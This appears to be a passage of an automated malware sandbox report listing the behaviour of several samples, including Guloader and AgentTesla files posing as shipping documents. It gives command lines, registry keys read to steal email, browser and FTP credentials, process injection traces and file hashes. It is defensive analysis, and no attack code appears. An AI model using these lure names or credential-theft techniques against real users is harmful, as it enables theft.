| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
memory/904-5-0x00007FFC2F330000-0x00007FFC2F340000-memory.dmp
memory/904-4-0x00007FFC2F330000-0x00007FFC2F340000-memory.dmp
memory/904-12-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp
memory/904-11-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp
memory/904-14-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp
memory/904-13-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp
memory/904-10-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp
memory/904-9-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp
memory/904-15-0x00007FFC2D1D0000-0x00007FFC2D1E0000-memory.dmp
memory/904-16-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp
memory/904-8-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp
memory/904-7-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp
memory/904-17-0x00007FFC2D1D0000-0x00007FFC2D1E0000-memory.dmp
memory/904-18-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp
memory/904-6-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp
memory/904-3-0x00007FFC2F330000-0x00007FFC2F340000-memory.dmp
memory/904-2-0x00007FFC2F330000-0x00007FFC2F340000-memory.dmp
memory/904-1-0x00007FFC6F34D000-0x00007FFC6F34E000-memory.dmp
memory/904-0-0x00007FFC2F330000-0x00007FFC2F340000-memory.dmp
memory/904-34-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp
memory/904-35-0x00007FFC6F34D000-0x00007FFC6F34E000-memory.dmp
memory/904-36-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | 685657fb7094a8866ed6f5e2af57c914 |
| SHA1 | cd68e6a7b50e91b41863b1cbb4227510d8899bbe |
| SHA256 | ca42f861122e74fd6e5aba72eb91a303f1b3b21bb9251917a0e574fc22a051d0 |
| SHA512 | af36cfdbe692c588d7c362ac3c4b40fc7f6d6d18b5392a16b45e9330c4d09575e9343e4509f74ee234fb5065fe29c7515d5721d5db6fbcff33ded971ae2cb962 |
Analysis: behavioral18
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4544 wrote to memory of 1420 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4544 wrote to memory of 1420 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4544 wrote to memory of 1420 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1420 -ip 1420
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1420 -s 608
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.77.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\I055170_06975755.xls"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| FR | 52.109.68.129:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.68.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.80.50.20.in-addr.arpa | udp |
Files
memory/2256-1-0x00007FF8DAE2D000-0x00007FF8DAE2E000-memory.dmp
memory/2256-0-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp
memory/2256-2-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp
memory/2256-5-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp
memory/2256-4-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp
memory/2256-3-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp
memory/2256-8-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-9-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-10-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-12-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-11-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-13-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp
memory/2256-7-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-14-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-16-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-18-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp
memory/2256-19-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-21-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-20-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-17-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-15-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-6-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-47-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-48-0x00007FF8DAE2D000-0x00007FF8DAE2E000-memory.dmp
memory/2256-49-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | 7c52d81cb1d43b12fd2df4b1fef0efc6 |
| SHA1 | 514243668197d913f3789e0020dbf75271579dbe |
| SHA256 | ecdba0b3ff658beebd94f387d9b5338a63953e594a49868b6bf69ae34e1545ad |
| SHA512 | 804b81b574e8f68bf0a7425a0b554c49fde7fa712c61c6d8dddedecafb199bdb7d38b7a9ba645666a20d6f30f65e39100f25bd417560fe288a2f392d04bd5ccd |
Analysis: behavioral30
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20240729-en
Max time kernel
60s
Max time network
18s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\XSG8996380.xls
Network
Files
memory/1172-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/1172-1-0x000000007337D000-0x0000000073388000-memory.dmp
memory/1172-2-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-7-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-4-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-13-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-12-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-11-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-10-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-9-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-8-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-6-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-5-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-3-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-14-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-15-0x000000007337D000-0x0000000073388000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
152s
Max time network
157s
Command Line
Signatures
Guloader family
Guloader,Cloudeye
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe
"C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.194.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\nsgA26B.tmp\Math.dll
| MD5 | 85428cf1f140e5023f4c9d179b704702 |
| SHA1 | 1b51213ddbaedfffb7e7f098f172f1d4e5c9efba |
| SHA256 | 8d9a23dd2004b68c0d2e64e6c6ad330d0c648bffe2b9f619a1e9760ef978207a |
| SHA512 | dfe7f9f3030485caf30ec631424120030c3985df778993342a371bf1724fa84aa885b4e466c6f6b356d99cc24e564b9c702c7bcdd33052172e0794c2fdecce59 |
C:\Users\Admin\AppData\Local\Temp\nsgA26B.tmp\System.dll
| MD5 | cff85c549d536f651d4fb8387f1976f2 |
| SHA1 | d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e |
| SHA256 | 8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8 |
| SHA512 | 531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88 |
memory/2720-15-0x0000000003490000-0x0000000003590000-memory.dmp
memory/2720-16-0x0000000003490000-0x0000000003590000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20241010-en
Max time kernel
120s
Max time network
127s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2860 -s 224
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
158s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2444 wrote to memory of 2808 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2444 wrote to memory of 2808 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2444 wrote to memory of 2808 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Windows.System.Diagnostics.TraceReporting.PlatformDiagnosticActions.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Windows.System.Diagnostics.TraceReporting.PlatformDiagnosticActions.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
140s
Max time network
148s
Command Line
Signatures
AgentTesla
Agenttesla family
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5068 set thread context of 3864 | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"
C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.208.201.84.in-addr.arpa | udp |
Files
memory/5068-0-0x000000007466E000-0x000000007466F000-memory.dmp
memory/5068-1-0x00000000002D0000-0x00000000003A2000-memory.dmp
memory/5068-2-0x0000000074660000-0x0000000074E10000-memory.dmp
memory/5068-3-0x0000000004DE0000-0x0000000004DEE000-memory.dmp
memory/5068-4-0x0000000004F40000-0x0000000004FD2000-memory.dmp
memory/5068-5-0x000000007466E000-0x000000007466F000-memory.dmp
memory/5068-6-0x0000000074660000-0x0000000074E10000-memory.dmp
memory/5068-7-0x0000000005280000-0x000000000531C000-memory.dmp
memory/5068-8-0x0000000005650000-0x000000000570C000-memory.dmp
memory/5068-9-0x0000000005710000-0x000000000574C000-memory.dmp
memory/3864-10-0x0000000000400000-0x000000000043C000-memory.dmp
memory/3864-13-0x0000000074660000-0x0000000074E10000-memory.dmp
memory/5068-14-0x0000000074660000-0x0000000074E10000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Consignment Document.pdf.exe.log
| MD5 | e50d61d6d5cec0d2c6b3fbf02b17af2d |
| SHA1 | fcf43f96e7389c27ee201fb00b65db01ca2cee40 |
| SHA256 | a87cf2dbf70a59d3d347f9ca743b6ceb3c805b4714cf4fb963c18b9ca8ffd0a9 |
| SHA512 | 0348b60095cd48d275a5234fe34c1fd7a7c9921e1d92dafea0379d607f898eb1c2e089dafa1db608fad65497fc8f90fa699109b06a5f2c12c0bc8c9192ff9924 |
memory/3864-15-0x0000000005CA0000-0x0000000006244000-memory.dmp
memory/3864-16-0x0000000074660000-0x0000000074E10000-memory.dmp
memory/3864-17-0x0000000005940000-0x0000000005958000-memory.dmp
memory/3864-18-0x0000000006500000-0x0000000006566000-memory.dmp
memory/3864-19-0x0000000074660000-0x0000000074E10000-memory.dmp
memory/3864-20-0x0000000074660000-0x0000000074E10000-memory.dmp
memory/3864-21-0x0000000006C00000-0x0000000006C50000-memory.dmp
memory/3864-22-0x0000000006BE0000-0x0000000006BEA000-memory.dmp
memory/3864-23-0x0000000074660000-0x0000000074E10000-memory.dmp
memory/3864-24-0x0000000074660000-0x0000000074E10000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20241010-en
Max time kernel
139s
Max time network
19s
Command Line
Signatures
AgentTesla
Agenttesla family
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2600 set thread context of 2716 | N/A | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"
C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
